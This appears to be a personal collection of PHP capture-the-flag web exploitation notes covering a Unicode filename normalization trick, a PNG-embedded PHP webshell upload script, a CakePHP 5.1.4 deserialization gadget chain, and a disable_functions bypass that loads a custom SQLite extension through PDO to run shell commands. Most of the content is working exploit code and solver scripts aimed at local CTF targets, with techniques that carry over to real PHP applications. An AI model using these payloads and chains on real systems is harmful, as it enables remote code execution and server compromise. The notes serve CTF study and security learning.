    <file src="file://%7B%22source%22%3A%22https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F39d1be85-e7c6-4263-a666-a42da95a70df%2F623fe104-d76b-498f-b947-72dcd447fb71%2Fphpnotes-ec604b5d03f9d522_(1).tar.xz%22%2C%22permissionRecord%22%3A%7B%22table%22%3A%22block%22%2C%22id%22%3A%2219548583-e65d-80c0-b834-eab16e581516%22%2C%22spaceId%22%3A%2239d1be85-e7c6-4263-a666-a42da95a70df%22%7D%7D"></file>
    from here: [phpnotes \| hxp 38C3 CTF](https://2024.ctf.link/internal/challenge/b98bbcec-faad-40a0-8efa-e2998039d5be/)
    [phpnotes - hxp 38C3 CTF Web Challenge Writeup \| siunam’s Website](https://siunam321.github.io/ctf/hxp-38C3-CTF/Web/phpnotes/)
    <empty-block/>
    Instead, we (ab)use the fact that the storage backend uses `werkzeug.util.secure_filename` to derive a “secure” filename for the note (without slashes or path traversal, etc.) — but that performs NFKD unicode normalization of the input first, so lots of Unicode characters get converted to normal printable ASCII. You can find normalization tables [here](https://www.unicode.org/charts/normalization/). For example, `ᶠₗₐℊ` (`\u1da0\u2097\u2090\u210a`) will be normalized to `flag`.
    <empty-block/>
    # PHP_ICO [https://github.com/chrisbliss18/php-ico](https://github.com/chrisbliss18/php-ico) / bypass imagecreatefromstring
    You can upload file container special crafted png and then it will be saved in the server with your payload in plain text

    PHP_ICO Exploit Note: Bypassing imagecreatefromstring

    Source: chrisbliss18/php-ico

    Summary

    You can upload a specially crafted PNG file that embeds your payload as plain text.

    The server will save the file with your payload intact, allowing for potential exploitation.

    Proof of Concept

    import httpx
    import asyncio
    import numpy as np
    import cv2
    
    # Base URL of the target application
    URL = "<http://localhost:8080>"
    
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.AsyncClient(base_url=url)
    
    
    class API(BaseAPI):
        async def convert_png_to_ico(self, file) -> httpx.Response:
            return await self.c.post("/", files={"file": file})
    
    
    def generate_image_from_bits(bits: str, size: tuple, output_file: str):
        """
        Generate an RGBA image from binary bits and save it to a file.
    
        :param bits: Binary data to encode into the image.
        :param size: Tuple specifying the image dimensions (width, height).
        :param output_file: Path to save the output PNG file.
        """
    
        # Create an empty image array with RGBA channels
        im = np.zeros((*size, 4), np.uint8)
    
        for ind, i in enumerate(bits):
            x = ind % size[0]
            y = size[1] - 1 - (ind // size[0])  # Flip vertically to match OpenCV's top-left origin
            im[y][x] = [255, 255, 255, (1 - int(i)) * 255]
    
        # Fill remaining pixels (if any) with white and full opacity
        for ind in range(len(bits), size[0] * size[1]):
            x = ind % size[0]
            y = size[1] - 1 - (ind // size[0])
            im[y][x] = [255, 255, 255, 255]
    
        # Save the image to disk
        cv2.imwrite(output_file, im)
        print(f"Image saved to {output_file}")
    
    
    async def main():
        """Main function to generate and upload a payload as a PNG file."""
    
        # Generate payload and convert to bits
        payload = b"<?php system($_GET['c'])?>"
        bits = ''.join([bin(i)[2:].zfill(8) for i in payload])
    
        print(bits)
        print(len(bits))
    
        # Image size
        size = (32, 32)
    
        # Generate the image from bits
        output_file = "result.png"
        generate_image_from_bits(bits, size, output_file)
    
        # Send the generated image to the server
        api = API()
        response = await api.convert_png_to_ico((".php", open(output_file, "rb"), "image/png"))
        print(response.text)
    
    
    if __name__ == "__main__":
        asyncio.run(main())

    POP gadget in CakePHP 5.1.4

    Reference: SUCTF-2025 / web / SU_POP / writeup

    <?php
    
    namespace ReactPromiseInternal {
    
    class RejectedPromise
    {
        private $reason = "x";
    
        /** @var bool */
        private $handled = false;
    
        public function __construct($reason)
        {
            $this->reason = $reason;
        }
    }
    
    }
    
    namespace CakeTestSuiteConstraintResponse {
    
    class HeaderEquals
    {
        protected string $headerName;
    }
    
    }
    
    namespace Twig {
    
    class ExtensionSet
    {
        private $initialized = true;
        private $parserCallbacks = ["system"];
    }
    
    }
    
    namespace CakeORM {
    
    class Table
    {
        protected BehaviorRegistry $_behaviors;
    
        public function __construct()
        {
            $this->_behaviors = new CakeORMBehaviorRegistry();
        }
    
        public function initTable1()
        {
            $cache = new ComposerCache();
            $table2 = new CakeORMTable();
            $extSet = new TwigExtensionSet();
    
            $table2->_behaviors->setLoaded(
                [
                    "emptydirectory" => $extSet,
                    "x" => $extSet,
                    "lol" => new ReactPromiseInternalRejectedPromise("lol")
                ],
                ["emptydirectory" => ["x", "getTokenParser"]]
            );
    
            $cache->setFilesystem($table2);
    
            $this->_behaviors->setLoaded(
                [
                    "name" => $cache,
                    "x" => $cache,
                    // "table" => new ReactPromiseInternalRejectedPromise("lol")
                ],
                ["name" => ["x", "clear"]]
            );
        }
    }
    
    class BehaviorRegistry
    {
        protected array $_methodMap;
        protected array $_loaded;
    
        /*
        public function __construct()
        {
            $this->_loaded = [
                "name" => new ComposerCache(),
                "x" => new ComposerCache(),
                // "table" => new ReactPromiseInternalRejectedPromise("lol")
            ];
        }
        */
    
        public function setLoaded($loaded, $_methodMap)
        {
            $this->_loaded = $loaded;
            $this->_methodMap = $_methodMap;
        }
    }
    
    }
    
    namespace CakeCacheEngine {
    
    class RedisEngine
    {
        protected $_Redis;
    
        public function __construct()
        {
            $this->_Redis = new CakeORMTable();
        }
    }
    
    }
    
    namespace CakeDatabaseLog {
    
    class LoggedQuery
    {
    }
    
    }
    
    namespace CakeView {
    
    class Cell
    {
    }
    
    }
    
    namespace CakeHttpClient {
    
    class FormData
    {
        protected array $_parts = [];
    
        public function __construct()
        {
            $this->_parts = [new CakeORMTable()];
            $this->_parts[0]->initTable1();
        }
    }
    
    }
    
    namespace CakeCollectionIterator {
    
    class ReplaceIterator
    {
        protected $_callback = "system";
        protected Traversable $_innerIterator;
    
        public function __construct()
        {
            $this->_innerIterator = new ArrayIterator(["abcd"]);
        }
    }
    
    }
    
    /*
    ReactPromiseInternalRejectedPromise => __destruct => tostring
    CakeHttpClientFormData => toString
    */
    
    namespace Composer {
    
    /*
    public function exists(): bool
    {
        return $this->getAdapter()->hasTable($this->getName());
    }
    */
    
    class Cache
    {
        private $enabled = true;
        private $root = "find /flag.txt -exec cat {} \\;";
        private $filesystem;
    
        public function __construct()
        {
            // $this->filesystem = new CakeORMTable();
        }
    
        public function setFilesystem($filesystem)
        {
            $this->filesystem = $filesystem;
        }
    }
    
    }
    
    namespace {
        // $o = new CakeCacheEngineRedisEngine();
        $e = new CakeDatabaseLogLoggedQuery();
        $e = new CakeViewCell();
        $e = new CakeHttpClientFormData();
        $o = new ReactPromiseInternalRejectedPromise($e);
        file_put_contents("ser", serialize($o));
    }
    ?>

    Usage note:

    /ser/?ser=base64encoded

    Related reference: CakePHP 反序列化 POP 链挖掘 - 先知社区

    yeah ill just drop the relevant snippets

    Relevant snippets

    public function __destruct()
    {
        if ($this->handled) {
            return;
        }
    
        $handler = set_rejection_handler(null);
    
        if ($handler === null) {
            $message = 'Unhandled promise rejection with ' . $this->reason;
    $this->reason is untyped so we can use any object here
    public function __toString(): string
    {
        if ($this->isMultipart()) {
            $boundary = $this->boundary();
            $out = '';
    
            foreach ($this->_parts as $part) {
                $out .= "--{$boundary}\\r\\n";
                $out .= (string)$part;
                $out .= "\\r\\n";
            }
    
            $out .= "--{$boundary}--\\r\\n";
            return $out;
        }
    
        $data = [];
    
        foreach ($this->_parts as $part) {
            $data[$part->name()] = $part->value();
    $this->_parts can be set to anything, so we will use $part->name() to trigger __call__ of ORM\\Table.php
    public function call(string $method, array $args = []): mixed
    {
        $method = strtolower($method);
    
        if ($this->hasMethod($method) && $this->has($this->_methodMap[$method][0])) {
            [$behavior, $callMethod] = $this->_methodMap[$method];
            return $this->_loaded[$behavior]->{$callMethod}(...$args);
        }
    We can set _methodMap and _loaded such that we have full control over $this->_loaded[$behavior]->{$callMethod}, but not $args.
    public function clear()
    {
        if ($this->isEnabled() && !$this->readOnly) {
            $this->filesystem->emptyDirectory($this->root);
            return true;
        }
    
        return false;
    }

    Kawaii PHP Jail

    Event Name-
    Source URL-
    Challenge NameKawaii PHP Jail
    Attachments
  • Manual upload: solve.py
  • References

  • Root cause: eval(isset($_GET['cmd']) ? $_GET['cmd'] : '') gives direct attacker-controlled PHP execution.
  • The jail blocks common process helpers, but it leaves file_put_contents() available, allows writes under /tmp, and does not block SQLite extension loading through PDO.
  • Final exploit chain: upload a base64-encoded shared object to /tmp/libhello_fd.so, decode it server-side, create new Pdo\Sqlite('sqlite::memory:'), call $db->loadExtension('/tmp/libhello_fd.so'), then execute SELECT exec_cmd('cat /flag.txt') via a function exported by the extension.
  • Validation: reran locally against http://localhost:12345/; the solver successfully loaded the extension and read /flag.txt.
  • why it is vulnerable

    // src/index.php
    echo eval(isset($_GET['cmd']) ? $_GET['cmd'] : '');
    
    // php.ini
    disable_functions = exec,shell_exec,system,passthru,...,dl,...
    open_basedir = /var/www/html:/tmp

    exploit payload

    $db = new Pdo\Sqlite('sqlite::memory:');
    $db->loadExtension('/tmp/libhello_fd.so');
    echo $db->query("SELECT exec_cmd('cat /flag.txt')")->fetchColumn();

    solver

    #include <stdio.h>
    #include <string.h>
    #include <sqlite3ext.h>
    SQLITE_EXTENSION_INIT1
    
    static void exec_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
        const char *command = (const char*)sqlite3_value_text(argv[0]);
        FILE *fp = popen(command, "r");
        char buffer[4096], output[8192] = "";
        while (fp && fgets(buffer, sizeof(buffer), fp)) {
            strncat(output, buffer, sizeof(output) - strlen(output) - 1);
        }
        if (fp) pclose(fp);
        sqlite3_result_text(context, output, -1, SQLITE_TRANSIENT);
    }
    
    int sqlite3_hellofd_init(sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi) {
        SQLITE_EXTENSION_INIT2(pApi);
        sqlite3_create_function(db, "exec_cmd", 1, SQLITE_UTF8, 0, exec_function, 0, 0);
        return SQLITE_OK;
    }
    import asyncio
    import base64
    import httpx
    
    URL = "http://localhost:12345/"
    SO_B64 = base64.b64encode(open("libhello_fd.so", "rb").read()).decode()
    
    async def php(code):
        async with httpx.AsyncClient(base_url=URL, timeout=30) as c:
            r = await c.get("/", params={"cmd": code})
            return r.text
    
    async def main():
        for i in range(0, len(SO_B64), 4000):
            chunk = SO_B64[i:i+4000]
            mode = "" if i == 0 else ",FILE_APPEND"
            await php(f"file_put_contents('/tmp/libhello_fd.so.b64','{chunk}'{mode});")
        await php("file_put_contents('/tmp/libhello_fd.so', base64_decode(file_get_contents('/tmp/libhello_fd.so.b64')));")
        print(await php("$db = new Pdo\\Sqlite('sqlite::memory:'); $db->loadExtension('/tmp/libhello_fd.so'); echo $db->query(\"SELECT exec_cmd('cat /flag.txt')\")->fetchColumn();"))
    
    asyncio.run(main())

    Categories & Topics

    This note is categorized under the following topics. Click on any category to explore more related content.

    Share this note

    Share:

    Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.